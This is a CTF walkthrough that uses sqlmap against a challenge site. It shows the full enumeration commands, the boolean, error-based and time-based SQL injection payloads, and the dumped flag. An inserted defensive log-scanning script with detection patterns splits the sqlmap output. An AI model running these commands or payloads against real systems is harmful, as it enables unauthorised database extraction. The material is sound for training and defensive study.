Open the page:
Entering a single quote produces an error:
Clearly a SQL injection.
The hint says to look for a shortcut. If we are talking shortcuts, sqlmap? Even without the hint I would run sqlmap first, haha.
sqlmap -u "http://node4.anna.nssctf.cn:28069/index.php?id=1" --batch
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1") (specify the target URL)
--batch Never ask for user input, use the default behavior (no prompts, run with defaults)
Returned result:
sqlmap identified the following injection point(s) with a total of 223 HTTP(s) requests:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1142=1142 AND 'Bbac'='Bbac
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1149 FROM(SELECT COUNT(*),CONCAT(0x7162627171,(SELECT (ELT(1149=1149,1))),0x716b767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'thit'='thit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))HWge) AND 'SCoq'='SCoq
From the results, three techniques are usable: boolean-based blind, error-based, and time-based blind injection.
But since we are using sqlmap anyway, it does not matter which technique it picks, as long as it runs through.
sqlmap -u "http://node4.anna.nssctf.cn:28069/index.php?id=1" --dbs --batch
--dbs Enumerate DBMS databases (list all databases)
Returned result:
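From the defender's side, the three techniques sqlmap reported above leave recognisable shapes in the web server's access log. The following Python script is an added example, not part of the original writeup: it scans a few constructed combined-format log lines (modelled on the payloads shown above, with a sqlmap-style User-Agent) and labels each suspicious request by technique.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log lines (not captured from the challenge server).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /index.php?id=1%27 HTTP/1.1" 500 210 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
10.0.0.5 - - [01/Jan/2024:12:00:03 +0000] "GET /index.php?id=1%27%20AND%201142%3D1142%20AND%20%27Bbac%27%3D%27Bbac HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
10.0.0.5 - - [01/Jan/2024:12:00:04 +0000] "GET /index.php?id=1%27%20AND%20(SELECT%201149%20FROM(SELECT%20COUNT(*),CONCAT(0x7162627171,(SELECT%20(ELT(1149%3D1149,1))),0x716b767171,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27thit%27%3D%27thit HTTP/1.1" 500 230 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
10.0.0.5 - - [01/Jan/2024:12:00:09 +0000] "GET /index.php?id=1%27%20AND%20(SELECT%201337%20FROM%20(SELECT(SLEEP(5)))HWge)%20AND%20%27SCoq%27%3D%27SCoq HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
"""

# Apache/nginx "combined" format: ip ident user [ts] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# One signature per technique sqlmap reported; matched against the URL-decoded parameter values.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),   # tautology such as 1142=1142
    "error-based": re.compile(r"FLOOR\(RAND\(\d*\)\s*\*\s*2\)", re.I),        # duplicate-key trick on RAND(0)
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d", re.I),               # SLEEP(n) inside the query
}

def classify_request(path, user_agent):
    """Return the set of labels that apply to one request's query string and User-Agent."""
    values = " ".join(v for _, v in parse_qsl(urlsplit(path).query, keep_blank_values=True))
    hits = {name for name, rx in SIGNATURES.items() if rx.search(values)}
    if "'" in values and not hits:          # lone quote: the initial syntax probe
        hits.add("quote probe")
    if user_agent.lower().startswith("sqlmap"):
        hits.add("sqlmap user-agent")
    return hits

def scan_log(text):
    """Parse each log line and return (ip, timestamp, status, sorted labels) for flagged requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_request(m["path"], m["ua"])
        if hits:
            findings.append((m["ip"], m["ts"], int(m["status"]), sorted(hits)))
    return findings

if __name__ == "__main__":
    for ip, ts, status, labels in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} HTTP {status}: {', '.join(labels)}")
```

A real deployment would read the live access log and alert on the first quote probe, well before the boolean and time-based payloads appear; the 500 responses alongside the probes are a second signal that the application leaks database errors.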
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] test_db
In a CTF, though, usually only the current database matters.
sqlmap -u "http://node4.anna.nssctf.cn:28069/index.php?id=1" --current-db --batch
--current-db Retrieve DBMS current database (show the current database)
Returned result:
current database: 'test_db'
sqlmap -u "http://node4.anna.nssctf.cn:28069/index.php?id=1" -D test_db --tables --batch
-D DB DBMS database to enumerate (specify the database)
--tables Enumerate DBMS database tables (list all tables)
Returned result:
Database: test_db
[2 tables]
+---------+
| test_tb |
| users   |
+---------+
sqlmap -u "http://node4.anna.nssctf.cn:28069/index.php?id=1" -D test_db -T test_tb --columns --batch
-T TBL DBMS database table(s) to enumerate (specify the table)
--columns Enumerate DBMS database table columns (list all column names)
Returned result:
Database: test_db
Table: test_tb
[2 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| flag   | varchar(50) |
| id     | int(11)     |
+--------+-------------+
sqlmap -u "http://node4.anna.nssctf.cn:28069/index.php?id=1" -D test_db -T test_tb -C flag --dump --batch
-C COL DBMS database table column(s) to enumerate (specify the column)
--dump Dump DBMS database table entries (dump every entry of the selected column)
Returned result:
Database: test_db
Table: test_tb
[1 entry]
+----------------------------------------------+
| flag                                         |
+----------------------------------------------+
| NSSCTF{5830169a-cff1-4daa-b648-6961414eb2fc} |
+----------------------------------------------+
I had never been very fluent with sqlmap before, so this was a good chance to get familiar with it.